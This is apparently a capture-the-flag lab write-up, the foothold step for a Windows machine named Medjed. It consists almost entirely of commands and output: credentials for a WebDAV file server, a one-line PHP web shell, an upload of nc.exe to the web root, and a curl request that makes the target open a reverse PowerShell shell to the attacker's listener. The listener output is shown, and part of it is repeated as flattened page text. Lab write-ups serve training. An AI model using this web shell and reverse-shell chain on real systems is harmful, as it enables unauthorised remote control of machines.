Foothold

adot:Pwned123!

Inspiration with cadaver

❯ cadaver
dav:!> open http://192.168.160.127:8000/fs/88dbf60667052595/
dav:/fs/88dbf60667052595/> cd ..
Authentication required for Web File Server on server `192.168.160.127':
Username: adot
Password:
dav:/fs/> ls
Listing collection `/fs/': succeeded.
Coll:   C                                      0  Dec 31  1969
Coll:   D                                      0  Dec 31  1969
dav:/fs/> cd C
dav:/fs/C/> ls
Listing collection `/fs/C/': succeeded.
Coll:   $Recycle.Bin                           0  Nov  3  2020
Coll:   $WinREAgent                            0  Dec  2  2021
Coll:   Documents and Settings                 0  Oct 16  2020
Coll:   FTP                                    0  Nov  3  2020
Coll:   PerfLogs                               0  Dec  7  2019
Coll:   Program Files (x86)                    0  Dec  2  2021
Coll:   Program Files                          0  Dec  2  2021
Coll:   ProgramData                            0  Dec  7  2021
Coll:   RailsInstaller                         0  Nov  3  2020
Coll:   Recovery                               0  Dec  2  2021
Coll:   Ruby26-x64                             0  Nov  3  2020
Coll:   Sites                                  0  Nov  3  2020
Coll:   System Volume Information              0  Oct 16  2020
Coll:   Users                                  0  Dec  2  2021
Coll:   Windows                                0  Apr  8  2022
Coll:   bd                                     0  Oct  8 07:29
Coll:   xampp                                  0  Oct 16  2020
        DumpStack.log.tmp                   8192  Aug  2 15:29
        output.txt                          2696  Oct  8 07:16
        pagefile.sys                   738197504  Aug  2 15:29
        swapfile.sys                   268435456  Aug  2 15:29
dav:/fs/C/>

❯ echo test > test.txt

❯ echo "<?php echo shell_exec(\$_GET['cmd']); ?>" > cmd.php

dav:/fs/C/xampp/htdocs/> put nc.exe
Uploading nc.exe to `/fs/C/xampp/htdocs/nc.exe':
Progress: [=============================>] 100.0% of 59392 bytes succeeded.

❯ curl http://192.168.160.127:45332/cmd.php\?cmd\=nc.exe+192.168.45.239+8000+-e+powershell.exe

❯ nc -lnvp 8000
listening on [any] 8000 ...
connect to [192.168.45.239] from (UNKNOWN) [192.168.160.127] 50608
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Try the new cross-platform PowerShell https://aka.ms/pscore6

PS C:\xampp\htdocs> whoami ; type C:\Users\Jerren\Desktop\local.txt ; ipconfig
whoami ; type C:\Users\Jerren\Desktop\local.txt ; ipconfig
medjed\jerren
e51dcad7ed48861988c2bd2337cdc9c3

Windows IP Configuration


Ethernet adapter Ethernet0:

   Connection-specific DNS Suffix  . :
   IPv4 Address. . . . . . . . . . . : 192.168.160.127
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 192.168.160.254

Previous30021 NextPriv Esc

Last updated 4 months ago

❯ cadaver dav:!> open http://192.168.160.127:8000/fs/88dbf60667052595/ dav:/fs/88dbf60667052595/> cd .. Authentication required for Web File Server on server `192.168.160.127': Username: adot Password: dav:/fs/> ls Listing collection `/fs/': succeeded. Coll: C 0 Dec 31 1969 Coll: D 0 Dec 31 1969 dav:/fs/> cd C dav:/fs/C/> ls Listing collection `/fs/C/': succeeded. Coll: $Recycle.Bin 0 Nov 3 2020 Coll: $WinREAgent 0 Dec 2 2021 Coll: Documents and Settings 0 Oct 16 2020 Coll: FTP 0 Nov 3 2020 Coll: PerfLogs 0 Dec 7 2019 Coll: Program Files (x86) 0 Dec 2 2021 Coll: Program Files 0 Dec 2 2021 Coll: ProgramData 0 Dec 7 2021 Coll: RailsInstaller 0 Nov 3 2020 Coll: Recovery 0 Dec 2 2021 Coll: Ruby26-x64 0 Nov 3 2020 Coll: Sites 0 Nov 3 2020 Coll: System Volume Information 0 Oct 16 2020 Coll: Users 0 Dec 2 2021 Coll: Windows 0 Apr 8 2022 Coll: bd 0 Oct 8 07:29 Coll: xampp 0 Oct 16 2020 DumpStack.log.tmp 8192 Aug 2 15:29 output.txt 2696 Oct 8 07:16 pagefile.sys 738197504 Aug 2 15:29 swapfile.sys 268435456 Aug 2 15:29 dav:/fs/C/>

❯ nc -lnvp 8000 listening on [any] 8000 ... connect to [192.168.45.239] from (UNKNOWN) [192.168.160.127] 50608 Windows PowerShell Copyright (C) Microsoft Corporation. All rights reserved. Try the new cross-platform PowerShell https://aka.ms/pscore6 PS C:\xampp\htdocs> whoami ; type C:\Users\Jerren\Desktop\local.txt ; ipconfig whoami ; type C:\Users\Jerren\Desktop\local.txt ; ipconfig medjed\jerren e51dcad7ed48861988c2bd2337cdc9c3 Windows IP Configuration Ethernet adapter Ethernet0: Connection-specific DNS Suffix . : IPv4 Address. . . . . . . . . . . : 192.168.160.127 Subnet Mask . . . . . . . . . . . : 255.255.255.0 Default Gateway . . . . . . . . . : 192.168.160.254